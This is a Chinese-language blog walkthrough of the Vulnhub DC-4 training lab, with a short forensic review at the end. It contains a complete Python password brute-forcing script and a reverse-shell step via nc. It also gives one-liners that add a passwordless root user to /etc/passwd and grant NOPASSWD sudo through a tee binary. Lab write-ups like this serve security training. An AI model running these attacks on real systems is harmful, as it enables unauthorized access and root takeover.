dc4靶场通过及溯源

原创 已于 2025-11-29 12:23:48 修改 · 649 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

于 2025-11-29 11:11:15 首次发布

一、前置知识

(1)/var目录

典型子目录包括:

  • /var/log → 日志文件(不断增长)
  • /var/cache → 应用缓存
  • /var/lib → 程序状态数据(如数据库)
  • /var/spool → “排队”或“待处理”的数据
  • /var/mail → 用户邮箱(传统 Unix 邮件存储)

dc系列靶场,很多重要的东西都在邮件里面,了解邮件所在位置什么关键。

(2)/etc/passwd、/etc/sudoers和/etc/shadow

这三个文件是本地提权的常用文件。

二、信息收集

使用nmap扫描发现,靶机dc4开放了2个入口,ssh服务和http服务。

nginx 1.15.10也没发现可利用的漏洞。

网站目录扫描一下,没发现什么敏感文件和目录。

采用登录网站,bp抓包的方式,发现网站没有什么反暴力破解的方式,于是开展爆破。

三、网站密码爆破

bp抓包后,尝试爆破,但是速度太慢了,通过修改cookie或者删除cookie,我发现都是可以继续发送登录请求的,几乎没有限制。为了提高爆破速度,我自己写了一个python脚本,将bp抓的数据包丢进去,开始爆破,

#!/usr/bin/env python3
import requests
import csv
import sys
import re
import os

# ==================== 配置区 ====================
TARGET_URL = "http://192.168.136.193/login.php"
USERNAME = "admin"
COOKIE = ""

WORDLIST = "/usr/share/seclists/Passwords/500-worst-passwords.txt"
OUTPUT_CSV = "bruteforce_results.csv"  # 输出文件名
# ===============================================

HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://192.168.136.193",
    "Connection": "keep-alive",
    "Referer": "http://192.168.136.193",
    "Upgrade-Insecure-Requests": "1",
    "Priority": "u=0, i",
    "Cookie": COOKIE
}

def sanitize_for_csv(text):
    """清理文本,避免 CSV 格式错乱"""
    if not isinstance(text, str):
        text = str(text)
    return re.sub(r'[\r\n\t]', ' ', text).strip()

def try_password(password):
    pwd = password.strip()
    if not pwd:
        return None

    data = {"username": USERNAME, "password": pwd}

    try:
        response = requests.post(
            TARGET_URL,
            headers=HEADERS,
            data=data,
            allow_redirects=False,
            timeout=10
        )

        status = response.status_code
        length = len(response.content)
        location = response.headers.get("Location", "")
        content = response.text

        # 关键词检测(可自定义)
        content_lower = content.lower()
        has_error = int("error" in content_lower or "invalid" in content_lower or "wrong" in content_lower)
        has_welcome = int(any(kw in content_lower for kw in ["welcome", "dashboard", "logout", "success", "logged"]))

        snippet = sanitize_for_csv(content[:200])  # 前200字符用于参考

        return {
            "password": sanitize_for_csv(pwd),
            "status_code": status,
            "response_length": length,
            "location": sanitize_for_csv(location),
            "has_error_keyword": has_error,
            "has_success_keyword": has_welcome,
            "response_snippet": snippet
        }

    except Exception as e:
        return {
            "password": sanitize_for_csv(pwd),
            "status_code": "ERR",
            "response_length": 0,
            "location": sanitize_for_csv(str(e)),
            "has_error_keyword": 0,
            "has_success_keyword": 0,
            "response_snippet": "Request failed"
        }

def main():
    # 加载字典
    try:
        with open(WORDLIST, "r", errors="ignore") as f:
            passwords = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"[-] Wordlist not found: {WORDLIST}", file=sys.stderr)
        sys.exit(1)

    print(f"[*] Loaded {len(passwords)} passwords.")
    print(f"[*] Output will be saved to: {OUTPUT_CSV}")

    # 写入 CSV
    fieldnames = [
        "password",
        "status_code",
        "response_length",
        "location",
        "has_error_keyword",
        "has_success_keyword",
        "response_snippet"
    ]

    with open(OUTPUT_CSV, "w", newline="", encoding="utf-8") as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()

        for i, pwd in enumerate(passwords, 1):
            result = try_password(pwd)
            if result:
                writer.writerow(result)
            # 可选:显示进度(不影响 CSV)
            if i % 50 == 0:
                print(f"    Processed: {i}/{len(passwords)}", end='\r', file=sys.stderr)

    print(f"\n[+] Done! Results saved to: {os.path.abspath(OUTPUT_CSV)}")

if __name__ == "__main__":
    main()

由于很难说清楚登录成功后的状态是302还是303或者是200,我的脚本就把常见的字段保存为csv,然后分析知道,happy是正确答案。值得注意的是,如果你爆破时候带了cookies,那么happy之后的字典都会成功,因为这个时候服务器已经标识你成功登录了,不会验证了。

四、获取www-data权限

登录网站后,发现有个command.php文件,可以执行一部分命令。

命令可以放在radio中执行,但是它是有长度限制的,执行python的反弹shell长度就不够用。

在这里,要注意bash不能执行,nc和python可以,同时这个目录www-data是没有写的权限的,

因此文件上传、/dev/tcp回连都不行,只能用nc -e。

用msf监听模块开启监听,发送nc命令后,建立反弹shell,发现目录缺失不能写,只能写到tmp目录写,如果过分操作还会被记录,自动发送邮件。

使用find 查找suid也没发现重要的文件,test.sh也没有什么用处。搜集一番后发现系统有个三个用户,同时还有jim的备用密码,还有一些邮件信息。使用python开启hfs服务下载密码备份表进行爆破。

爆破后得到jim的密码

五、获取其他用户的密码

登录后使用sudo -l发现jim用户没有任何特殊权限,但是在它的邮箱发现了另外一个用户的密码。

可以在/var/mail 也可以在/var/spool/mail中查看

j大概意思是charles休假了把密码给了jim。

切换到charles用户,输入密码,检查sudo -l 发现有sudo tee的nopass 的特殊权限

六、特殊文件特权

输入teehee -h发现他就是tee,可以追加文件

下面介绍两种方式提权到root

1.添加新的root用户

新建一个空口令的账户到passwd文件,切换后就是root用户

echo 'pwn::0:0::/root:/bin/bash' | sudo teehee -a /etc/passwd

2.给与所有操作sudo的NOPASSWD权限

echo  'charles ALL=(ALL) NOPASSWD: ALL' | sudo teehee -a /etc/sudoers

七、溯源分析

输入ps -auxef,发现了www-data用户的nc连结和charles用户的切换用户时产生的颜色变化。值得注意的是修改passwd和sudoers的操作并没有被记录下来,并且邮箱告警也只会在密码次数错误太多才会发出。

[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
DC3靶场通过及溯源分析
yiduiguwen的专栏
11-26 292
只开启了80端口www服务,3306端口仅能本机访问。nmap探测,发现只有80端口。
DC2 靶场通关及溯源分析
yiduiguwen的专栏
11-18 657
在完成通关后,我们获得了一个root账号权限,通过修改sshd文件,新增root用户密码,配置sshd服务允许管理员root账户登录,并将root账户加入可允许登录账号得列表中(此前只有tom可以登录)。
DC1 靶场通关及溯源分析
yiduiguwen的专栏
10-28 728
本文从溯源角度分析DC1靶场渗透过程。首先通过hydra爆破获得密码后,详细记录了攻击前后系统状态变化:msf利用Drupal 7.0漏洞建立会话后,观察到异常网络连接(59148→4444端口)和两个可疑php进程;通过解码apache日志发现回连信息。在获取flag过程中,利用数据库配置文件找到凭证,修改admin密码哈希值登录系统。最后通过分析/var/log/auth.log验证了ssh爆破痕迹。文中包含关键命令如提权操作、密码哈希生成和数据库修改等,完整呈现了攻击链和相应的取证分析方法。
dc-4靶机 命令注入及溯源反制
m0_48454948的博客
01-06 146
命令注入及溯源反制
红日靶场vulnstack 4靶机的测试报告[细节](三)
ccc_9wy的博客
12-08 1074
基于渗透测试流程测试vulnstack 4靶场;内网渗透;域渗透;黄金票据;权限维持;Kerberos;红日靶场;痕迹清理;清理日志;krbtgt。
红队内网靶场
qq_18811919的博客
04-14 4274
下面几个跨域靶场会陆续加上vCenter/Kubernetes/gitlab/ADCS/exchange/等常见系统,也会陆续做安全运营相关靶场从防守方视角反推红队攻击路径逆向分析木马IoC排查终端木马编写相关报告,如果大家对靶场系列感兴趣的话欢迎关注。
记录渗透靶场实战【网络安全】
热门推荐
kali_Ma的博客
11-06 2万+
第一次写靶场实战的文章,有不足之处还请多多指教。本次实战的靶场是红日安全vulnstack系列的第二个靶场靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 环境搭建 网络环境 网卡配置 只需要在VM上选择对应网卡即可,不需要在靶机中进行配置。 DC IP:10.10.10.10 (VMnet5) OS:Windows 2012(x64) WEB IP1:192.168.111.80 (VMnet6) IP2:10.10.10.80 (VM
溯源流程学习
weixin_75158417的博客
03-22 1105
根据已有的线索,攻击方式以及攻击特征等通过技术手段反查攻击者身份或是组织信息。
纵横网络靶场--协议相关writeup
潇逗
04-10 2047
纵横网络网址: https://game.fengtaisec.com/黑客通过外网进入一家工厂的控制网络,之后对工控网络中的操作员站系统进行了攻击,最终通过工控协议破坏了正常的业务。我们得到了操作员站在攻击前后的网络流量数据包,我们需要分析流量中的蛛丝马迹,找到FLAG,flag形式为 flag{} 下载pcap文件。 方法一: 直接找modbus协议 ,直接length进行排序,长度117也比较可疑,打开就是flag 点击追踪流-》TCP 方法二:拿到流量分析的文件,观察到他现实读取了线圈和保存寄存器
墨者学院-CMS系统漏洞分析溯源(第4题)
JimWu的博客
09-04 916
CMS系统漏洞分析溯源(第4题) 难易程度:★★★ 题目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
[网络安全自学篇] 八十九.PE文件解析之通过Python获取时间戳
杨秀璋的专栏
07-23 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了基于机器学习的恶意代码检测技术,包括机器学习概述与算法举例、基于机器学习方法的恶意代码检测、机器学习算法在工业界的应用。这篇文章将尝试软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源,但也存在局限性。文章同时也普及了PE文件分析和APT溯源相关基础,基础性文章,希望对您有所帮助~
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
linux上redis升级
2509_94083833的博客
11-29 866
redis-cli -h 192.168.111.100 -p 6379 -a 123123 -n 数据库序号(0-15)#如果是4.* 的就要升级,因为redis6.2 以上需要gcc 9.*的版本,不然make 编译redis时会报错。这里你可以先下载到本地,在通过ftp 的方式上传到服务器,也可以直接 wget 下载。在启动新版的redis 时,可以将数据文件放到启动目录下。-n:指定数据库序号,默认是序号0,redis有16个库(0-15)-a:指定密码,未设置数据库密码可以省略-a选项。
Linux(CentOS)安装 MySQL
2509_94088022的博客
11-29 751
CentOS版本:CentOS 7三种安装方式:一、通过 yum 安装,最简单,一键安装,全程无忧。二、通过 rpm 包安装,需具备基础概念及常规操作。三、通过 gz 包安装,需具备配置相关操作。
Linux】冯诺依曼体系结构和操作系统概述
Miun123的博客
11-29 1758
冯诺依曼体系结构是现代计算机的基础设计,由运算器、控制器、存储器、输入设备和输出设备五大部件组成,通过总线连接。操作系统采用先描述,再组织的方式进行软硬件管理,通过系统调用和库函数为用户提供安全便捷的接口。
Linux性能调优详解FIO性能测试的几个常用场景
运维老生常谈
11-29 675
fio是测试存储系统非常重要的工具,能够快速检测出磁盘的IOPS、吞吐能力,以及时间延迟。该工具能够发起指定类型的IO操作,例如顺序读写、随机读写。同时还可以发起多线性,模拟高负载场景。针对常用的IOPS、吞吐量、时延,如何有效利用fio工具,下面进行详细的讲解。
Linux驱动开发】Linux EXT4文件系统技术深度解析与实践指南
最新发布
love131452098的博客
12-02 610
EXT4 (Fourth Extended Filesystem) 是Linux系统中最常用的日志文件系统,是EXT3的进化版。它在性能、可靠性和容量方面进行了重大改进,支持更大的文件系统和更大的文件。作为Linux内核的主流文件系统,EXT4被广泛应用于各种场景,从嵌入式设备到大型服务器
Linux 中替换某个目录下所有文件中的特定字符串
liweiweili126的博客
12-02 410
Linux 中替换某个目录下所有文件中的特定字符串,核心是用 findsed组合,支持灵活扩展(如备份原文件、过滤文件类型、排除目录等)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值